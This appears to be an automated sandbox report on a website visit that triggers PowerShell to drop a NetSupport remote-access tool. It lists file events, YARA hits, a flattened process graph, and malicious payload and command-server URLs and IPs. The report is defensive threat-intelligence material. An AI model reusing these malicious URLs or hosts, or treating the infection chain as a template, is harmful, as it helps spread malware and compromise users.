Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Directory\client32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Yara detected NetSupport remote tool
Source: Yara match File source: 00000022.00000002.1973402402.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2020043160.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973680770.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000000.1888686094.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.1969236658.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.1763409289.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2019779438.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.1759185059.000000000520A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973008502.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2021916267.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891661737.00000000111E1000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2022624501.000000006C090000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2021848504.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.1973644487.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1890861207.0000000000F92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1891623943.0000000011193000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 3244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: client32.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\pcicapi.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\client32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\HTCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICHEK.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\TCCTL32.DLL, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Directory\PCICL32.DLL, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1700159 URL: http://www.focuslight.com/ Startdate: 27/05/2025 Architecture: WINDOWS Score: 100 68 www.insideedgepr.com 2->68 70 wp.wpenginepowered.com 2->70 90 Suricata IDS alerts for network traffic 2->90 92 Sigma detected: Powershell drops NetSupport RAT client 2->92 94 Multi AV Scanner detection for dropped file 2->94 96 6 other signatures 2->96 11 cmd.exe 1 2->11         started        14 chrome.exe 2 2->14         started        17 client32.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 100 Suspicious powershell command line found 11->100 21 cmd.exe 2 11->21         started        24 cmd.exe 1 11->24         started        26 conhost.exe 11->26         started        80 192.168.2.4, 138, 443, 49422 unknown unknown 14->80 82 192.168.2.17 unknown unknown 14->82 28 chrome.exe 14->28         started        signatures6 process7 dnsIp8 98 Suspicious powershell command line found 21->98 31 powershell.exe 57 21->31         started        35 client32.exe 4 21->35         started        38 powershell.exe 15 17 21->38         started        42 2 other processes 21->42 40 cmd.exe 1 24->40         started        74 www.focuslight.com 159.138.57.153, 443, 49726, 49727 HWCLOUDS-AS-APHUAWEICLOUDSHK Singapore 28->74 76 focuslight-www.oss-ap-southeast-1.aliyuncs.com 47.79.48.222, 443, 49745, 49746 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 28->76 78 7 other IPs or domains 28->78 signatures9 process10 dnsIp11 54 C:\Users\user\AppData\...\libstdc++-6.dll, PE32+ 31->54 dropped 56 C:\Users\user\AppData\Roaming\...\itvwd64.sys, PE32+ 31->56 dropped 58 C:\Users\user\AppData\...\avutil-51.dll, PE32 31->58 dropped 62 32 other malicious files 31->62 dropped 84 Sample is not signed and drops a device driver 31->84 72 5.252.178.123, 443, 49762 MIVOCLOUDMD Moldova Republic of 35->72 86 Multi AV Scanner detection for dropped file 35->86 60 C:\Users\user\AppData\Roaming\Program.zip, Zip 38->60 dropped 88 Powershell drops PE file 38->88 44 cmd.exe 1 40->44         started        file12 signatures13 process14 process15 46 cmd.exe 1 44->46         started        process16 48 curl.exe 2 46->48         started        dnsIp17 64 wp.wpenginepowered.com 141.193.213.10, 443, 49759, 49760 DV-PRIMARY-ASN1US United States 48->64 66 127.0.0.1 unknown unknown 48->66 52 C:\ProgramData\xss.bat, ASCII 48->52 dropped file18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
3.168.147.20
 dja7ygzgr04yk.cloudfront.net United States 16509 AMAZON-02US false
5.252.178.123
 unknown Moldova Republic of 39798 MIVOCLOUDMD true
159.138.57.153
 www.focuslight.com Singapore 136907 HWCLOUDS-AS-APHUAWEICLOUDSHK true
13.249.126.115
 unknown United States 16509 AMAZON-02US false
47.79.48.222
 focuslight-www.oss-ap-southeast-1.aliyuncs.com United States 9500 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ false
142.251.40.36
 www.google.com United States 15169 GOOGLEUS false
141.193.213.10
 wp.wpenginepowered.com United States 396845 DV-PRIMARY-ASN1US false
77.83.199.73
 meimei68.top Lithuania 12679 ASN-MOLMoscowRussiaRU false
162.214.153.12
 ace-project.org United States 46606 UNIFIEDLAYER-AS-1US false
13.249.126.78
 tr.lfeeder.com United States 16509 AMAZON-02US false

Private

IP
192.168.2.17
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
dja7ygzgr04yk.cloudfront.net 3.168.147.20 true
tr.lfeeder.com 13.249.126.78 true
ace-project.org 162.214.153.12 true
www.google.com 142.251.40.36 true
focuslight-www.oss-ap-southeast-1.aliyuncs.com 47.79.48.222 true
www.focuslight.com 159.138.57.153 true
meimei68.top 77.83.199.73 true
wp.wpenginepowered.com 141.193.213.10 true
www.insideedgepr.com unknown unknown
sc.lfeeder.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.insideedgepr.com/header.php true
    		unknown
    https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781 true
      		unknown
      http://5.252.178.123/fakeurl.htm true
        		unknown
        https://meimei68.top/lsass/jsson.js false
          		unknown
          https://meimei68.top/lsass/index.js?8a7441451c8ad03d76 false
            		unknown
            https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg false
              		unknown
              http://c.pki.goog/r/r4.crl false
                		high
                https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg false
                  		unknown
                  https://meimei68.top/lsass/index.php?fHYWBUn3 false
                    		unknown
                    https://ace-project.org/d.js true
                      		unknown
                      https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg false
                        		unknown
                        https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 false
                          		unknown
                          https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/05/LWOP-EN-scaled.jpg false
                            		unknown
                            https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg false
                              		unknown
                              https://www.focuslight.com/ false
                                		unknown
                                http://www.focuslight.com/ false
                                  		unknown